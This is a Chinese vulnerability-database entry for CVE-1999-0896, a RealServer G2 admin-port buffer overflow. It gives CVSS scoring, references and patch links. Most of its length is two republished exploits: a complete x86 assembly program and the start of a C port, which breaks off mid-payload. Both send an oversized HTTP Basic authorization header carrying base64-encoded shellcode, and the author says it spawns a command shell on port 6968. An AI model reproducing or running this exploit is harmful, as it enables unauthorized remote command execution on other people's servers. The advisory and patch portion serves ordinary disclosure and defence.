CVE-1999-0896
CVSS10.0
发布时间 :1999-11-04 00:00:00
修订时间 :2008-09-09 08:36:08
NMCOE    

[原文]Buffer overflow in RealNetworks RealServer administration utility allows remote attackers to execute arbitrary commands via a long username and password.


[CNNVD]Real Server管理员端口缓冲区溢出漏洞(CNNVD-199911-020)

        RealNetworks RealServer管理员实用工具中存在缓冲区溢出漏洞。远程攻击者通过一条长的用户名和密码执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0896
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0896
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-020
(官方数据源) CNNVD

- 其它链接及资源

http://service.real.com/help/faq/servg260.html
(UNKNOWN)  MISC  http://service.real.com/help/faq/servg260.html
http://www.securityfocus.com/bid/767
(UNKNOWN)  BID  767

- 漏洞信息

Real Server管理员端口缓冲区溢出漏洞
危急 缓冲区溢出
1999-11-04 00:00:00 2006-01-05 00:00:00
远程※本地  
        RealNetworks RealServer管理员实用工具中存在缓冲区溢出漏洞。远程攻击者通过一条长的用户名和密码执行任意命令。

- 公告与补丁

        Real Networks has released patches to adress this issue.
        Windows NT:
        http://docs.real.com/docs/g260authpatch/ppvb3260.dll
        FreeBSD2:
        http://docs.real.com/docs/g260authpatch/freebsd2/ppvbasic.so.6.0
        FreeBSD3:
        http://docs.real.com/docs/g260authpatch/freebsd3/ppvbasic.so.6.0
        Irix 6.2:
        http://docs.real.com/docs/g260authpatch/irix62/ppvbasic.so.6.0
        Linux libc5:
        http://docs.real.com/docs/g260authpatch/linux2/ppvbasic.so.6.0
        Linux libc6:
        http://docs.real.com/docs/g260authpatch/linuxc6/ppvbasic.so.6.0
        Digital UNIX:
        http://docs.real.com/docs/g260authpatch/osf4/ppvbasic.so.6.0
        Solaris 2.51:
        http://docs.real.com/docs/g260authpatch/solaris551/ppvbasic.so.6.0
        Solaris 2.6:
        http://docs.real.com/docs/g260authpatch/solaris56/ppvbasic.so.6.0
        Solaris 2.7:
        http://docs.real.com/docs/g260authpatch/solaris57/ppvbasic.so.6.0

- 漏洞信息 (19592)

Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (1) (EDBID:19592)
windows remote
1999-11-04 Verified
0 dark spyrit
N/A [点击下载]
source: http://www.securityfocus.com/bid/767/info

At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server.

; The binary is available at http://www.beavuh.org.
;
; This exploits a buffer overflow in RealServers web authentication on
; the administrator port - hence the reason the shellcode is base64 encoded.
; This has been tested on the NT version with a default installation.
; If RealServer is installed in a different directory than the default, the
; buffer will need to be adjusted accordingly.
; The administrator port is randomly selected at installation, but as you'll
; only be testing on your own networks this won't matter :)
;
; To assemble:
;
; tasm32 -ml realown.asm
; tlink32 -Tpe -c -x realown.obj ,,, import32
;
; TASM 5 required!
;
; dark spyrit  <dspyrit@beavuh.org>


.386p
locals
jumps
.model flat, stdcall


extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC


.data

sploit:

db "GET /admin/index.html HTTP/1.0",0dh,0ah
db "Connection: Keep-Alive",0dh,0ah
db "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)",0dh,0ah
db "Host: 111.111.11.1:1111",0dh,0ah
db "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*",0dh,0ah
db "Accept-Language: en",0dh,0ah
db "Accept-Charset: iso-8859-1,*,utf-8",0dh,0ah
db "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
db "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
db "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
db "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
db "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
db "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
db "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
db "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
db "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
db "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
db "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
db "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
db "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
db "84fyZ/////w==",0dh,0ah,0dh,0ah,0

sploit_length equ $-sploit

logo  db "RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.", 13, 10
      db "by dark spyrit <dspyrit@beavuh.org>",13,10,13,10
      db "usage: realown <host> <admin_port>", 13, 10
      db "eg - realown host.com 6666",13,10
      db "the exploit will spawn a command prompt on port 6968",13,10,0
      logolen equ $-logo


errorinit db 10,"error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit

derror  db 10,"error.",13,10,0
derrorl equ $-derror

nohost db 10,"no host or ip specified.", 13,10,0
nohostl equ $-nohost

noport db 10,"no port specified.",13,10,0
noportl equ $-noport

reshost db 10,"error resolving host.",13,10,0
reshostl equ $-reshost

sockerr db 10,"error creating socket.",13,10,0
sockerrl equ $-sockerr

ipill   db 10,"ip error.",13,10,0
ipilll   equ $-ipill

cnerror db 10,"error establishing connection.",13,10,0
cnerrorl equ $-cnerror

success db 10,"sent.. spawn connection now.",13,10,0
successl equ $-success

console_in      dd      ?
console_out     dd      ?
bytes_read      dd      ?

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_port2 db 256 dup (?)
buffer db 1000 dup (0)

.code
start:

        call    init_console
        push    logolen
        push    offset logo
        call    write_console

        call    GetCommandLineA
        mov     edi, eax
        mov     ecx, -1
        xor     al, al
        push    edi
        repnz   scasb
        not     ecx
        pop     edi
        mov     al, 20h
        repnz   scasb
        dec     ecx
        cmp     ch, 0ffh
        jz      @@0
        test    ecx, ecx
        jnz     @@1
@@0:        
        push    nohostl
        push    offset nohost
        call    write_console
        jmp     quit3
@@1:
        mov     esi, edi
        lea     edi, _host
        call    parse
        or      ecx, ecx
        jnz     @@2
        push    noportl
        push    offset noport
        call    write_console
        jmp     quit3
@@2:
        lea     edi, _port
        call    parse

        push    offset wsadata
        push    0101h
        call    WSAStartup
        or      eax, eax
        jz      winsock_found

        push    errorinitl
        push    offset errorinit
        call    write_console
        jmp     quit3

winsock_found:
        xor     eax, eax
        push    eax
        inc     eax
        push    eax
        inc     eax
        push    eax
        call    socket
        cmp     eax, -1
        jnz     socket_ok

        push    sockerrl
        push    offset sockerr
        call    write_console
        jmp     quit2

socket_ok:
        mov     sock, eax
        mov     sin.sin_family, 2
        
        mov     ebx, offset _port
        call    str2num
        mov     eax, edx
        push    eax
        call    htons
        mov     sin.sin_port, ax
        
        mov     esi, offset _host
lewp:
        xor     al, al
        lodsb
        cmp     al, 039h
        ja      gethost
        test    al, al
        jnz     lewp
        push    offset _host
        call    inet_addr
        cmp     eax, -1
        jnz     ip_aight
        push    ipilll
        push    offset ipill
        call    write_console
        jmp     quit1

ip_aight:
        mov     sin.sin_addr, eax
        jmp     continue

gethost:
        push    offset _host
        call    gethostbyname
        test    eax, eax
        jnz     gothost

        push    reshostl
        push    offset reshost
        call    write_console
        jmp     quit1

gothost:
        mov     eax, [eax+0ch]
        mov     eax, [eax]
        mov     eax, [eax]
        mov     sin.sin_addr, eax

continue:
        push    size sin
        push    offset sin
        push    sock
        call    connect
        or      eax, eax
        jz      connect_ok
        push    cnerrorl
        push    offset cnerror
        call    write_console
        jmp     quit1

connect_ok:
        
        xor     eax, eax
        push    eax
        push    sploit_length
        push    offset sploit
        push    sock
        call    send
        push    successl
        push    offset success
        call    write_console

quit1:
        push    sock
        call    closesocket
quit2:
        call    WSACleanup
quit3:
        push    0
        call    ExitProcess
parse   proc
;cheap parsing.. 
lewp9:
        xor     eax, eax
        cld
        lodsb
        cmp     al, 20h
        jz      done
        test    al, al
        jz      done2
        stosb
        dec     ecx
        jmp     lewp9
done:
        dec     ecx
done2:
        ret
endp

str2num proc
        push    eax ecx edi
        xor     eax, eax
        xor     ecx, ecx
        xor     edx, edx
        xor     edi, edi
lewp2:
        xor     al, al
        xlat
        test    al, al
        jz      end_it
        sub     al, 030h
        mov     cl, al
        mov     eax, edx
        mul     numbase
        add     eax, ecx
        mov     edx, eax
        inc     ebx
        inc     edi
        cmp     edi, 0ah
        jnz     lewp2

end_it:
        pop     edi ecx eax
        ret
endp

init_console  proc
        push    -10
        call    GetStdHandle
        or      eax, eax
        je      init_error
        mov     [console_in], eax
        push    -11
        call    GetStdHandle
        or      eax, eax
        je      init_error
        mov     [console_out], eax
        ret
init_error:
        push    0
        call    ExitProcess
endp

write_console proc    text_out:dword, text_len:dword
        pusha
        push    0
        push    offset bytes_read 
        push    text_len          
        push    text_out          
        push    console_out       
        call    WriteConsoleA
        popa
        ret
endp

end     start



		

- 漏洞信息 (19593)

Real Networks GameHouse dldisplay ActiveX control 0 Port Buffer Overflow (2) (EDBID:19593)
windows remote
1999-11-04 Verified
0 dark spyrit
N/A [点击下载]
source: http://www.securityfocus.com/bid/767/info
 
At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server.

/* RealNetworks RealServer G2 buffer overflow exploit

 *

 * by dark spyrit <dspyrit@beavuh.org>

 * quick unix port by team teso

 *

 * the windows binary is available at http://www.beavuh.org.

 *

 * This exploits a buffer overflow in RealServers web authentication on

 * the administrator port - hence the reason the shellcode is base64 encoded.

 * This has been tested on the NT version with a default installation.

 * If RealServer is installed in a different directory than the default, the

 * buffer will need to be adjusted accordingly.

 * The administrator port is randomly selected at installation, but as you'll

 * only be testing on your own networks this won't matter :)

 */



#include <sys/types.h>

#include <sys/time.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <unistd.h>

#include <errno.h>

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <fcntl.h>

#include <netdb.h>





/* local functions

 */

unsigned long int       net_resolve (char *host);

int                     net_connect (struct sockaddr_in *cs, char *server,

        unsigned short int port, int sec);



unsigned char   sploit[] =

        "GET /admin/index.html HTTP/1.0\x0d\x0a"

        "Connection: Keep-Alive\x0d\x0a"

        "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a"

        "Host: 111.111.11.1:1111\x0d\x0a"

        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a"

        "Accept-Language: en\x0d\x0a"

        "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a"

        "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

        "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"

        "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"

